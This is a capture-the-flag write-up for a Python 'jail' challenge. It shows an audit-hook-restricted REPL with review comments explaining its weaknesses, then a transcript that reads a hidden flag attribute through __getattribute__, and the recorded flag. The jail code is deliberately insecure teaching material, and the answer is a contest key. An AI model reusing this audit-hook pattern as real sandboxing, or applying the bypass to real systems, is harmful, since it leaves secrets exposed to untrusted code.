HAXLAB - Flag Leak
Category: PWN
MEDIUM
Welcome to HAXLAB, the world’s most secure MaaS® (math-as-a-service) with advanced functionality.
Note
For this part of the challenge, please submit the contents of flag1.txt.
jail.py
https://cdn.discordapp.com/attachments/840074210935177247/840076657075159040/jail.py
Connect via
nc haxlab.sdc.tf 1337
jail.py
#! /usr/bin/env python3
# flag2.txt and proprietary.py are in the working directory of the script in the hosted version
import sys
import proprietary # Our secure proprietary flag hider for flag1.txt
PROMPT = '>>> '

# sys.addaudithook() only exists from Python 3.8 onwards; the challenge author
# additionally insists on 3.8.5 or newer because older interpreters are
# considered too exposed to known exploits.
# NOTE(review): a version floor limits interpreter bugs only. It does not turn
# the audit hook used by this script into a sandbox.
if sys.version_info < (3, 8, 5):
    print("Sorry, your Python interpreter version is below the minimum system requirement to run HAXLAB.")
    sys.exit(1)
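def audit_hook(event, _):
    """Reject every audited operation that is not on the REPL's allow-list.

    Meant to be registered with sys.addaudithook(); the interpreter then calls
    it with the event name and an argument tuple (ignored here) each time an
    audit event is raised. An exception raised from the hook propagates to the
    code that triggered the event.

    NOTE(review): this filters *audited* operations only, so it is not a
    sandbox. PEP 578 hooks are a monitoring facility; anything that raises no
    audit event never reaches this function. The transcript on this page shows
    dir(), print() and attribute reads on ``flag1`` all running unhindered.

    Raises:
        RuntimeError: if ``event`` is not one of the allowed event names.
    """
    # These are the only necessary events for this Math REPL to work.
    # A plain set literal is enough: wrapping it in set() only copied it again
    # on every call of the hook.
    ALLOWED_EVENTS = {'builtins.input', 'builtins.input/result', 'exec', 'compile'}
    if event not in ALLOWED_EVENTS:
        # Thou shalt not hack!
        raise RuntimeError(f'Operation not permitted: {event}')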
# Fetched once at start-up, before the audit hook is installed further down.
# The transcript on this page shows the returned object is a
# proprietary.Flag1Holder; repl() places it in the namespace user code runs in.
# NOTE(review): handing the live secret-holding object to untrusted code means
# its protection rests entirely on how the holder hides the value.
flag1 = proprietary.get_flag1()
def repl():
    """Run the interactive prompt until end-of-input.

    Every non-empty line is compiled in 'single' mode and executed in one
    namespace that persists across lines. Syntax errors and exceptions raised
    by the executed code are printed and the loop carries on; Ctrl-C at the
    prompt prints 'canceled'; EOF prints a newline and ends the loop.

    NOTE(review): the namespace handed to exec() contains the live ``flag1``
    object, so every line the user types can reference it directly. exec()
    also inserts ``__builtins__`` into the dict, which is why the transcript on
    this page lists exactly ``__builtins__`` and ``flag1``. The audit hook is
    the only control in front of that object, and it only sees operations that
    raise an audit event.
    """
    namespace = {'flag1': flag1}
    while True:
        try:
            line = input(PROMPT)
        except EOFError:
            print()  # finish the prompt line before leaving
            return
        except KeyboardInterrupt:
            # Only an interrupt at the prompt is handled; the session goes on.
            print('canceled')
            continue

        if not line:  # nothing typed, prompt again
            continue

        try:
            compiled = compile(line, '<string>', 'single')
        except SyntaxError as err:
            # Other compile() failures are not caught here and leave repl().
            print(err)
        else:
            try:
                exec(compiled, namespace)
            except Exception as err:
                # The RuntimeError raised by the audit hook is an Exception
                # too, so a blocked operation is reported and the loop goes on.
                print(err)
# Start-up sequence; the order matters. The banner needs sys.version, so it is
# printed while the module still holds the name ``sys``.
print('======= HAXLAB - An advanced yet secure calculator =======\nPowered by Python ' + sys.version)
# You will never trigger these hooks if all you do is Math :)
# From this call on, every audit event outside audit_hook's allow-list raises
# RuntimeError. CPython offers no API to remove a hook once it has been added.
# NOTE(review): operations that raise no audit event are not affected at all;
# the transcript on this page shows attribute reads on flag1 going through.
sys.addaudithook(audit_hook)
# Removes only this module's binding of the name; the sys module itself stays
# loaded. NOTE(review): presumably meant to keep ``sys`` away from user code,
# although repl() executes input in its own separate namespace anyway.
del sys
try:
    # Enter the HAXLAB shell for the user to do Math
    repl()
except Exception as e:
    # Anything that escapes repl() (for example a compile() error other than
    # SyntaxError) is printed, after which the script ends.
    print(e)
Solution
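The transcript below is mostly self-explanatory. The REPL's namespace contains only `__builtins__` and `flag1`, and `flag1` is a `Flag1Holder` object whose secret sits in an attribute named `-flag1-`. That name is not a valid identifier, so it cannot be written with dot syntax, but it can still be looked up by string through `__getattribute__`. The audit hook stops none of `dir()`, `print()` or the attribute lookup, because it only sees operations that raise an audit event. Printing the value directly shows `REDACTED`, while printing a slice of it shows the flag; presumably the stored value masks itself when printed and the slice is a plain string, but `proprietary.py` is not shown, so that part is a guess. The lesson for defenders is that an odd attribute name on an object reachable from untrusted code is obfuscation, not access control.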
>>> exec("print(dir())")
['__builtins__', 'flag1']
>>> print(flag1)
<proprietary.Flag1Holder object at 0x7fec38c32a3
>>> print(dir(flag1))
['-flag1-', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']
>>> print(flag1.__getattribute__('-flag1-'))
REDACTED
>>> print(flag1.__getattribute__('-flag1-')[:-1])
sdctf{get@ttr_r3ads_3v3ryth1ng}
Flag
sdctf{get@ttr_r3ads_3v3ryth1ng}